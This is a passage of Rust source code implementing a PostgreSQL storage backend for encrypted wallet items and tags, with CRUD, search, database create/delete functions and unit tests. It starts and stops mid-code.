mut url_base = "postgresql://".to_owned(); match credentials.admin_account { Some(ref account) => url_base.push_str(&account[..]), None => () } url_base.push_str(":"); match credentials.admin_password { Some(ref password) => url_base.push_str(&password[..]), None => () } url_base.push_str("@"); url_base.push_str(&config.url[..]); url_base } fn _base_postgres_url(config: &PostgresConfig, credentials: &PostgresCredentials) -> String { let mut url_base = "postgresql://".to_owned(); url_base.push_str(&credentials.account[..]); url_base.push_str(":"); url_base.push_str(&credentials.password[..]); url_base.push_str("@"); url_base.push_str(&config.url[..]); url_base } fn _postgres_url(id: &str, config: &PostgresConfig, credentials: &PostgresCredentials) -> String { let mut url_base = PostgresStorageType::_base_postgres_url(config, credentials); url_base.push_str("/"); url_base.push_str(id); url_base } } impl WalletStorage for PostgresStorage { /// /// Tries to fetch values and/or tags from the storage. /// Returns Result with StorageEntity object which holds requested data in case of success or /// Result with WalletStorageError in case of failure. 
/// /// /// # Arguments /// /// * `type_` - type of the item in storage /// * `id` - id of the item in storage /// * `options` - JSON containing what needs to be fetched. /// Example: {"retrieveValue": true, "retrieveTags": true} /// /// # Returns /// /// Result that can be either: /// /// * `StorageRecord` - Contains name, optional value and optional tags /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` types of errors can be thrown by this method: /// /// * `WalletStorageError::Closed` - Storage is closed /// * `WalletStorageError::ItemNotFound` - Item is not found in database /// * `IOError("IO error during storage operation:...")` - Failed connection or SQL query /// fn get(&self, type_: &[u8], id: &[u8], options: &str) -> Result<StorageRecord, WalletStorageError> { let options: RecordOptions = if options == "{}" { // FIXME: RecordOptions::default() } else { serde_json::from_str(options)? }; let pool = self.pool.clone(); let conn = pool.get().unwrap(); let res: Result<(i64, Vec<u8>, Vec<u8>), WalletStorageError> = { let mut rows = conn.query( "SELECT id, value, key FROM items where type = $1 AND name = $2", &[&type_.to_vec(), &id.to_vec()]); match rows.as_mut().unwrap().iter().next() { Some(row) => Ok((row.get(0), row.get(1), row.get(2))), None => Err(WalletStorageError::ItemNotFound) } }; let item = match res { Ok(entity) => entity, Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)) }; let value = if options.retrieve_value { Some(EncryptedValue::new(item.1, item.2)) } else { None }; let type_ = if options.retrieve_type { Some(type_.clone()) } else { None }; let tags = if options.retrieve_tags { let mut tags = Vec::new(); // get all encrypted. let mut stmt = conn.prepare_cached("SELECT name, value FROM tags_encrypted WHERE item_id = $1")?; let mut rows = stmt.query(&[&item.0])?; let mut iter = rows.iter(); while let Some(res) = iter.next() { let row = res; //let tag_name: Vec<u8> = row.get(0); //let tag_value: Vec<u8> = row.get(1); tags.push(Tag::Encrypted(row.get(0), row.get(1))); } // get all plain let mut stmt = conn.prepare_cached("SELECT name, value FROM tags_plaintext WHERE item_id = $1")?; let mut rows = stmt.query(&[&item.0])?; let mut iter = rows.iter(); while let Some(res) = iter.next() { let row = res; //let tag_name: Vec<u8> = row.get(0); //let tag_value: String = row.get(1); tags.push(Tag::PlainText(row.get(0), row.get(1))); } Some(tags) } else { None }; Ok(StorageRecord::new(id.to_vec(), value, type_.map(|val| val.to_vec()), tags)) } /// /// Inserts value and tags into storage. /// Returns Result with () on success or /// Result with WalletStorageError in case of failure. 
/// /// /// # Arguments /// /// * `type_` - type of the item in storage /// * `id` - id of the item in storage /// * `value` - value of the item in storage /// * `value_key` - key used to encrypt the value /// * `tags` - tags assigned to the value /// /// # Returns /// /// Result that can be either: /// /// * `()` /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` classes of errors can be thrown by this method: /// /// * `WalletStorageError::Closed` - Storage is closed /// * `WalletStorageError::ItemAlreadyExists` - Item is already present in database /// * `IOError("IO error during storage operation:...")` - Failed connection or SQL query /// fn add(&self, type_: &[u8], id: &[u8], value: &EncryptedValue, tags: &[Tag]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let tx: transaction::Transaction = transaction::Transaction::new(&conn)?; let res = tx.prepare_cached("INSERT INTO items (type, name, value, key) VALUES ($1, $2, $3, $4) RETURNING id")? .query(&[&type_.to_vec(), &id.to_vec(), &value.data, &value.key]); let item_id = match res { Ok(rows) => { let res = match rows.iter().next() { Some(row) => Ok(row.get(0)), None => Err(WalletStorageError::ItemNotFound) }; let item_id: i64 = match res { Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)), Ok(id) => id }; item_id }, Err(err) => { if err.code() == Some(&postgres::error::UNIQUE_VIOLATION) || err.code() == Some(&postgres::error::INTEGRITY_CONSTRAINT_VIOLATION) { return Err(WalletStorageError::ItemAlreadyExists); } else { return Err(WalletStorageError::from(err)); } } }; let item_id = item_id as i64; if !tags.is_empty() { let stmt_e = tx.prepare_cached("INSERT INTO tags_encrypted (item_id, name, value) VALUES ($1, $2, $3)")?; let stmt_p = tx.prepare_cached("INSERT INTO tags_plaintext (item_id, name, value) VALUES ($1, $2, $3)")?; for tag in tags { match tag { &Tag::Encrypted(ref tag_name, ref tag_data) => { match stmt_e.execute(&[&item_id, tag_name, tag_data]) { Ok(_) => (), Err(err) => { if err.code() == Some(&postgres::error::UNIQUE_VIOLATION) || err.code() == Some(&postgres::error::INTEGRITY_CONSTRAINT_VIOLATION) { return Err(WalletStorageError::ItemAlreadyExists); } else { return Err(WalletStorageError::from(err)); } } } }, &Tag::PlainText(ref tag_name, ref tag_data) => { match stmt_p.execute(&[&item_id, tag_name, tag_data]) { Ok(_) => (), Err(err) => { if err.code() == Some(&postgres::error::UNIQUE_VIOLATION) || err.code() == Some(&postgres::error::INTEGRITY_CONSTRAINT_VIOLATION) { return Err(WalletStorageError::ItemAlreadyExists); } else { return Err(WalletStorageError::from(err)); } } } } }; } } tx.commit()?; Ok(()) } fn update(&self, type_: &[u8], id: &[u8], value: &EncryptedValue) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let res = conn.prepare_cached("UPDATE items SET value = $1, key = $2 WHERE type = $3 AND name = $4")? 
.execute(&[&value.data, &value.key, &type_.to_vec(), &id.to_vec()]); match res { Ok(1) => Ok(()), Ok(0) => Err(WalletStorageError::ItemNotFound), Ok(count) => Err(WalletStorageError::CommonError(CommonError::InvalidState(format!("PostgreSQL returned update row count: {}", count)))), Err(err) => Err(WalletStorageError::from(err)), } } fn add_tags(&self, type_: &[u8], id: &[u8], tags: &[Tag]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let tx: transaction::Transaction = transaction::Transaction::new(&conn)?; let res = { let mut rows = tx.prepare_cached("SELECT id FROM items WHERE type = $1 AND name = $2")? .query(&[&type_.to_vec(), &id.to_vec()]); match rows.as_mut().unwrap().iter().next() { Some(row) => Ok(row.get(0)), None => Err(WalletStorageError::ItemNotFound) } }; let item_id: i64 = match res { Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)), Ok(id) => id }; if !tags.is_empty() { let enc_tag_insert_stmt = tx.prepare_cached("INSERT INTO tags_encrypted (item_id, name, value) VALUES ($1, $2, $3) ON CONFLICT (name, item_id) DO UPDATE SET value = excluded.value")?; let plain_tag_insert_stmt = tx.prepare_cached("INSERT INTO tags_plaintext (item_id, name, value) VALUES ($1, $2, $3) ON CONFLICT (name, item_id) DO UPDATE SET value = excluded.value")?; for tag in tags { match tag { &Tag::Encrypted(ref tag_name, ref tag_data) => { match enc_tag_insert_stmt.execute(&[&item_id, tag_name, tag_data]) { Ok(_) => (), Err(err) => { if err.code() == Some(&postgres::error::UNIQUE_VIOLATION) || err.code() == Some(&postgres::error::INTEGRITY_CONSTRAINT_VIOLATION) { return Err(WalletStorageError::ItemAlreadyExists); } else { return Err(WalletStorageError::from(err)); } } } }, &Tag::PlainText(ref tag_name, ref tag_data) => { match plain_tag_insert_stmt.execute(&[&item_id, tag_name, tag_data]) { Ok(_) => (), Err(err) => { if err.code() == Some(&postgres::error::UNIQUE_VIOLATION) || err.code() == Some(&postgres::error::INTEGRITY_CONSTRAINT_VIOLATION) { return Err(WalletStorageError::ItemAlreadyExists); } else { return Err(WalletStorageError::from(err)); } } } } }; } } tx.commit()?; Ok(()) } fn update_tags(&self, type_: &[u8], id: &[u8], tags: &[Tag]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let tx: transaction::Transaction = transaction::Transaction::new(&conn)?; let res = { let mut rows = tx.prepare_cached("SELECT id FROM items WHERE type = $1 AND name = $2")? 
.query(&[&type_.to_vec(), &id.to_vec()]); match rows.as_mut().unwrap().iter().next() { Some(row) => Ok(row.get(0)), None => Err(WalletStorageError::ItemNotFound) } }; let item_id: i64 = match res { Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)), Ok(id) => id }; tx.execute("DELETE FROM tags_encrypted WHERE item_id = $1", &[&item_id])?; tx.execute("DELETE FROM tags_plaintext WHERE item_id = $1", &[&item_id])?; if !tags.is_empty() { let enc_tag_insert_stmt = tx.prepare_cached("INSERT INTO tags_encrypted (item_id, name, value) VALUES ($1, $2, $3)")?; let plain_tag_insert_stmt = tx.prepare_cached("INSERT INTO tags_plaintext (item_id, name, value) VALUES ($1, $2, $3)")?; for tag in tags { match tag { &Tag::Encrypted(ref tag_name, ref tag_data) => enc_tag_insert_stmt.execute(&[&item_id, tag_name, tag_data])?, &Tag::PlainText(ref tag_name, ref tag_data) => plain_tag_insert_stmt.execute(&[&item_id, tag_name, tag_data])? }; } } tx.commit()?; Ok(()) } fn delete_tags(&self, type_: &[u8], id: &[u8], tag_names: &[TagName]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let res = { let mut rows = conn.prepare_cached("SELECT id FROM items WHERE type = $1 AND name = $2")? .query(&[&type_.to_vec(), &id.to_vec()]); match rows.as_mut().unwrap().iter().next() { Some(row) => Ok(row.get(0)), None => Err(WalletStorageError::ItemNotFound) } }; let item_id: i64 = match res { Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)), Ok(id) => id }; let tx: transaction::Transaction = transaction::Transaction::new(&conn)?; { let enc_tag_delete_stmt = tx.prepare_cached("DELETE FROM tags_encrypted WHERE item_id = $1 AND name = $2")?; let plain_tag_delete_stmt = tx.prepare_cached("DELETE FROM tags_plaintext WHERE item_id = $1 AND name = $2")?; for tag_name in tag_names { match tag_name { &TagName::OfEncrypted(ref tag_name) => enc_tag_delete_stmt.execute(&[&item_id, tag_name])?, &TagName::OfPlain(ref tag_name) => plain_tag_delete_stmt.execute(&[&item_id, tag_name])?, }; } } tx.commit()?; Ok(()) } /// /// Deletes value and tags from storage. /// Returns Result with () on success or /// Result with WalletStorageError in case of failure. 
/// /// /// # Arguments /// /// * `type_` - type of the item in storage /// * `id` - id of the item in storage /// /// # Returns /// /// Result that can be either: /// /// * `()` /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` types of errors can be thrown by this method: /// /// * `WalletStorageError::Closed` - Storage is closed /// * `WalletStorageError::ItemNotFound` - Item is not found in database /// * `IOError("IO error during storage operation:...")` - Failed connection or SQL query /// fn delete(&self, type_: &[u8], id: &[u8]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let row_count = conn.execute( "DELETE FROM items where type = $1 AND name = $2", &[&type_.to_vec(), &id.to_vec()] )?; if row_count == 1 { Ok(()) } else { Err(WalletStorageError::ItemNotFound) } } fn get_storage_metadata(&self) -> Result<Vec<u8>, WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let res: Result<Vec<u8>, WalletStorageError> = { let mut rows = conn.query( "SELECT value FROM metadata", &[]); match rows.as_mut().unwrap().iter().next() { Some(row) => Ok(row.get(0)), None => Err(WalletStorageError::ItemNotFound) } }; match res { Ok(entity) => Ok(entity), Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)) } } fn set_storage_metadata(&self, metadata: &[u8]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); match conn.execute("UPDATE metadata SET value = $1", &[&metadata.to_vec()]) { Ok(_) => Ok(()), Err(error) => { Err(WalletStorageError::IOError(format!("Error occurred while updating the metadata: {}", error))) } } } fn get_all(&self) -> Result<Box<StorageIterator>, WalletStorageError> { let statement = self._prepare_statement("SELECT id, name, value, key, type FROM items")?; let fetch_options = RecordOptions { retrieve_type: true, retrieve_value: true, retrieve_tags: true, }; let pool = self.pool.clone(); let tag_retriever = Some(TagRetriever::new_owned(Rc::new(pool.get().unwrap()).clone())?); let storage_iterator = PostgresStorageIterator::new(Some(statement), &[], fetch_options, tag_retriever, None)?; Ok(Box::new(storage_iterator)) } fn search(&self, type_: &[u8], query: &language::Operator, options: Option<&str>) -> Result<Box<StorageIterator>, WalletStorageError> { let type_ = type_.to_vec(); // FIXME let search_options = match options { None => SearchOptions::default(), Some(option_str) => serde_json::from_str(option_str)? }; let pool = self.pool.clone(); let conn = pool.get().unwrap(); let total_count: Option<usize> = if search_options.retrieve_total_count { let (query_string, query_arguments) = query::wql_to_sql_count(&type_, query)?; let mut rows = conn.query( &query_string, &query_arguments[..]); match rows.as_mut().unwrap().iter().next() { Some(row) => { let x: i64 = row.get(0); Some(x as usize) }, None => None } } else { None }; if search_options.retrieve_records { let fetch_options = RecordOptions { retrieve_value: search_options.retrieve_value, retrieve_tags: search_options.retrieve_tags, retrieve_type: search_options.retrieve_type, }; let (query_string, query_arguments) = query::wql_to_sql(&type_, query, options)?; let statement = self._prepare_statement(&query_string)?; let tag_retriever = if fetch_options.retrieve_tags { let pool = self.pool.clone(); Some(TagRetriever::new_owned(Rc::new(pool.get().unwrap()).clone())?) 
} else { None }; let storage_iterator = PostgresStorageIterator::new(Some(statement), &query_arguments[..], fetch_options, tag_retriever, total_count)?; Ok(Box::new(storage_iterator)) } else { let storage_iterator = PostgresStorageIterator::new(None, &[], RecordOptions::default(), None, total_count)?; Ok(Box::new(storage_iterator)) } } fn close(&mut self) -> Result<(), WalletStorageError> { //let pool = self.pool.clone(); //let conn = pool.get().unwrap(); //let _ret = conn.finish(); Ok(()) } } impl PostgresStorage { fn _prepare_statement(&self, sql: &str) -> Result< OwningHandle<Rc<r2d2::PooledConnection<PostgresConnectionManager>>, Box<postgres::stmt::Statement<'static>>>, WalletStorageError> { let pool = self.pool.clone(); OwningHandle::try_new(Rc::new(pool.get().unwrap()).clone(), |conn| { unsafe { (*conn).prepare(sql) }.map(Box::new).map_err(WalletStorageError::from) }) } } impl WalletStorageType for PostgresStorageType { /// /// Deletes the Postgres wallet database with the provided id, using the connection details /// specified in the config file. /// /// # Arguments /// /// * `id` - id of the Postgres DB /// * `storage_config` - config containing the location of the Postgres DB /// * `storage_credentials` - DB credentials /// /// # Returns /// /// Result that can be either: /// /// * `()` /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` types of errors can be thrown by this method: /// /// * `WalletStorageError::NotFound` - Database with the provided id not found /// * `IOError(..)` - Deletion of the database failed /// fn delete_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>) -> Result<(), WalletStorageError> { let config = config .map(serde_json::from_str::<PostgresConfig>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize config: {:?}", err)))?; let credentials = credentials .map(serde_json::from_str::<PostgresCredentials>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize credentials: {:?}", err)))?; let config = match config { Some(config) => config, None => return Err(WalletStorageError::ConfigError) }; let credentials = match credentials { Some(credentials) => credentials, None => return Err(WalletStorageError::ConfigError) }; // if admin user and password aren't provided then bail if credentials.admin_account == None || credentials.admin_password == None { return Ok(()) } let url_base = PostgresStorageType::_admin_postgres_url(&config, &credentials); let url = PostgresStorageType::_postgres_url(id, &config, &credentials); match postgres::Connection::connect(&url[..], postgres::TlsMode::None) { Ok(conn) => { for sql in &_DROP_SCHEMA { match conn.execute(sql, &[]) { Ok(_) => (), Err(_) => () }; } let _ret = conn.finish(); () }, Err(_) => return Err(WalletStorageError::NotFound) }; let conn = postgres::Connection::connect(url_base, postgres::TlsMode::None)?; let drop_db_sql = str::replace(_DROP_WALLET_DATABASE, "$1", id); let ret = match conn.execute(&drop_db_sql, &[]) { Ok(_) => Ok(()), Err(_) => Ok(()) }; conn.finish()?; ret } /// /// Creates the Postgres DB schema with the provided name in the id specified in the config file, /// and initializes the encryption keys needed for encryption and decryption of data. 
/// /// # Arguments /// /// * `id` - name of the Postgres DB schema /// * `config` - config containing the location of postgres db /// * `credentials` - DB credentials /// * `metadata` - encryption keys that need to be stored in the newly created DB /// /// # Returns /// /// Result that can be either: /// /// * `()` /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` types of errors can be thrown by this method: /// /// * `AlreadyExists` - Schema with a given name already exists in the database /// * `IOError("IO error during storage operation:...")` - Connection to the DB failed /// * `IOError("Error occurred while creating wallet schema:..)"` - Creation of schema failed /// * `IOError("Error occurred while inserting the keys...")` - Insertion of keys failed /// fn create_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>, metadata: &[u8]) -> Result<(), WalletStorageError> { let config = config .map(serde_json::from_str::<PostgresConfig>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize config: {:?}", err)))?; let credentials = credentials .map(serde_json::from_str::<PostgresCredentials>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize credentials: {:?}", err)))?; let config = match config { Some(config) => config, None => return Err(WalletStorageError::ConfigError) }; let credentials = match credentials { Some(credentials) => credentials, None => return Err(WalletStorageError::ConfigError) }; // if admin user and password aren't provided then bail if credentials.admin_account == None || credentials.admin_password == None { return Ok(()) } let url_base = PostgresStorageType::_admin_postgres_url(&config, &credentials); let url = PostgresStorageType::_postgres_url(id, &config, &credentials); let conn = postgres::Connection::connect(&url_base[..], postgres::TlsMode::None)?; let create_db_sql = str::replace(_CREATE_WALLET_DATABASE, "$1", id); let mut schema_result = match conn.execute(&create_db_sql, &[]) { Ok(_) => Ok(()), Err(_error) => { Err(WalletStorageError::AlreadyExists) } }; conn.finish()?; let conn = match postgres::Connection::connect(&url[..], postgres::TlsMode::None) { Ok(conn) => conn, Err(error) => { return Err(WalletStorageError::IOError(format!("Error occurred while connecting to wallet schema: {}", error))); } }; for sql in &_CREATE_SCHEMA { match schema_result { Ok(_) => schema_result = match conn.execute(sql, &[]) { Ok(_) => Ok(()), Err(error) => { Err(WalletStorageError::IOError(format!("Error occurred while creating wallet schema: {}", error))) } }, _ => () } }; let ret = match schema_result { Ok(_) => { match conn.execute("INSERT INTO metadata(value) VALUES($1) ON CONFLICT (value) DO UPDATE SET value = excluded.value", &[&metadata]) { Ok(_) => Ok(()), Err(error) => { //std::fs::remove_file(db_path)?; Err(WalletStorageError::IOError(format!("Error occurred while inserting the keys: {}", error))) } } }, Err(error) => Err(error) }; conn.finish()?; ret } /// /// Establishes a connection to the Postgres DB with the provided id, as specified /// in the config. In case of a successful connection returns a Storage object /// embedding the connection and the encryption keys that will be used for encryption and /// decryption operations. 
/// /// /// # Arguments /// /// * `id` - id of the Postgres DB /// * `config` - config containing the location of the Postgres DB /// * `credentials` - DB credentials /// /// # Returns /// /// Result that can be either: /// /// * `(Box<Storage>, Vec<u8>)` - Tuple of `PostgresStorage` and `encryption keys` /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` types of errors can be thrown by this method: /// /// * `WalletStorageError::NotFound` - Database with the provided id not found /// * `IOError("IO error during storage operation:...")` - Failed connection or SQL query /// fn open_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>) -> Result<Box<PostgresStorage>, WalletStorageError> { let config = config .map(serde_json::from_str::<PostgresConfig>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize config: {:?}", err)))?; let credentials = credentials .map(serde_json::from_str::<PostgresCredentials>) .map_or(Ok(None), |v| v.map(Some)) .map_err(|err| CommonError::InvalidStructure(format!("Cannot deserialize credentials: {:?}", err)))?; let config = match config { Some(config) => config, None => return Err(WalletStorageError::ConfigError) }; let credentials = match credentials { Some(credentials) => credentials, None => return Err(WalletStorageError::ConfigError) }; let url = PostgresStorageType::_postgres_url(id, &config, &credentials); // don't need a connection, but connect just to verify we can let _conn = match postgres::Connection::connect(&url[..], postgres::TlsMode::None) { Ok(conn) => conn, Err(_) => return Err(WalletStorageError::NotFound) }; let manager = match PostgresConnectionManager::new(&url[..], TlsMode::None) { Ok(manager) => manager, Err(_) => return Err(WalletStorageError::NotFound) }; let pool = match r2d2::Pool::builder().min_idle(Some(0)).max_size(2).idle_timeout(Some(Duration::new(5, 0))).build(manager) { Ok(pool) => pool, Err(_) => return Err(WalletStorageError::NotFound) }; Ok(Box::new(PostgresStorage { pool: pool })) } } #[cfg(test)] mod tests { use super::*; use utils::test; #[test] fn postgres_storage_type_create_works() { _cleanup(); let storage_type = PostgresStorageType::new(); storage_type.create_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()).unwrap(); } #[test] fn postgres_storage_type_create_works_for_twice() { _cleanup(); let storage_type = PostgresStorageType::new(); storage_type.create_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()).unwrap(); let res = storage_type.create_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()); assert_match!(Err(WalletStorageError::AlreadyExists), res); } #[test] fn postgres_storage_get_storage_metadata_works() { _cleanup(); let storage = _storage(); let metadata = storage.get_storage_metadata().unwrap(); assert_eq!(metadata, _metadata()); } #[test] fn postgres_storage_type_delete_works() { _cleanup(); let storage_type = PostgresStorageType::new(); storage_type.create_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()).unwrap(); storage_type.delete_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])).unwrap(); } #[test] fn postgres_storage_type_delete_works_for_non_existing() { _cleanup(); let storage_type = PostgresStorageType::new(); storage_type.create_storage(_wallet_id(), 
Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..]), &_metadata()).unwrap(); let res = storage_type.delete_storage("unknown", Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])); assert_match!(Err(WalletStorageError::NotFound), res); storage_type.delete_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])).unwrap(); } #[test] fn postgres_storage_type_open_works() { _cleanup(); _storage(); } #[test] fn postgres_storage_type_open_works_for_not_created() { _cleanup(); let storage_type = PostgresStorageType::new(); let res = storage_type.open_storage("unknown", Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])); assert_match!(Err(WalletStorageError::NotFound), res); } #[test] fn postgres_storage_add_works_for_is_802() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.add(&_type1(), &_id1(), &_value1(), &_tags()); assert_match!(Err(WalletStorageError::ItemAlreadyExists), res); let res = storage.add(&_type1(), &_id1(), &_value1(), &_tags()); assert_match!(Err(WalletStorageError::ItemAlreadyExists), res); } #[test] fn postgres_storage_set_get_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); assert_eq!(_sort(record.tags.unwrap()), _sort(_tags())); } #[test] fn postgres_storage_set_get_works_for_twice() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.add(&_type1(), &_id1(), &_value2(), &_tags()); assert_match!(Err(WalletStorageError::ItemAlreadyExists), res); } #[test] fn postgres_storage_set_get_works_for_reopen() { _cleanup(); { _storage().add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); } let storage_type = PostgresStorageType::new(); let storage = storage_type.open_storage(_wallet_id(), Some(&_wallet_config()[..]), Some(&_wallet_credentials()[..])).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); assert_eq!(_sort(record.tags.unwrap()), _sort(_tags())); } #[test] fn postgres_storage_get_works_for_wrong_key() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.get(&_type1(), &_id2(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##); assert_match!(Err(WalletStorageError::ItemNotFound), res) } #[test] fn postgres_storage_delete_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); assert_eq!(_sort(record.tags.unwrap()), _sort(_tags())); storage.delete(&_type1(), &_id1()).unwrap(); let res = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##); assert_match!(Err(WalletStorageError::ItemNotFound), res); } #[test] fn postgres_storage_delete_works_for_non_existing() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let res = storage.delete(&_type1(), &_id2()); 
assert_match!(Err(WalletStorageError::ItemNotFound), res); } #[test] fn postgres_storage_create_and_find_multiple_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record1 = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record1.value.unwrap(), _value1()); assert_eq!(_sort(record1.tags.unwrap()), _sort(_tags())); storage.add(&_type2(), &_id2(), &_value2(), &_tags()).unwrap(); let record2 = storage.get(&_type2(), &_id2(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record2.value.unwrap(), _value2()); assert_eq!(_sort(record2.tags.unwrap()), _sort(_tags())); } #[test] fn postgres_storage_get_all_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); storage.add(&_type2(), &_id2(), &_value2(), &_tags()).unwrap(); let mut storage_iterator = storage.get_all().unwrap(); let record = storage_iterator.next().unwrap().unwrap(); assert_eq!(record.type_.unwrap(), _type1()); assert_eq!(record.value.unwrap(), _value1()); assert_eq!(_sort(record.tags.unwrap()), _sort(_tags())); let record = storage_iterator.next().unwrap().unwrap(); assert_eq!(record.type_.unwrap(), _type2()); assert_eq!(record.value.unwrap(), _value2()); assert_eq!(_sort(record.tags.unwrap()), _sort(_tags())); let record = storage_iterator.next().unwrap(); assert!(record.is_none()); } #[test] fn postgres_storage_get_all_works_for_empty() { _cleanup(); let storage = _storage(); let mut storage_iterator = storage.get_all().unwrap(); let record = storage_iterator.next().unwrap(); assert!(record.is_none()); } #[test] fn postgres_storage_update_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); storage.update(&_type1(), &_id1(), &_value2()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value2()); } #[test] fn postgres_storage_update_works_for_non_existing_id() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); let res = storage.update(&_type1(), &_id2(), &_value2()); assert_match!(Err(WalletStorageError::ItemNotFound), res) } #[test] fn postgres_storage_update_works_for_non_existing_type() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, "retrieveTags": true}"##).unwrap(); assert_eq!(record.value.unwrap(), _value1()); let res = storage.update(&_type2(), &_id1(), &_value2()); assert_match!(Err(WalletStorageError::ItemNotFound), res) } #[test] fn postgres_storage_add_tags_works() { _cleanup(); let storage = _storage(); storage.add(&_type1(), &_id1(), &_value1(), &_tags()).unwrap(); storage.add_tags(&_type1(), &_id1(), &_new_tags()).unwrap(); let record = storage.get(&_type1(), &_id1(), r##"{"retrieveType": false, "retrieveValue": true, 
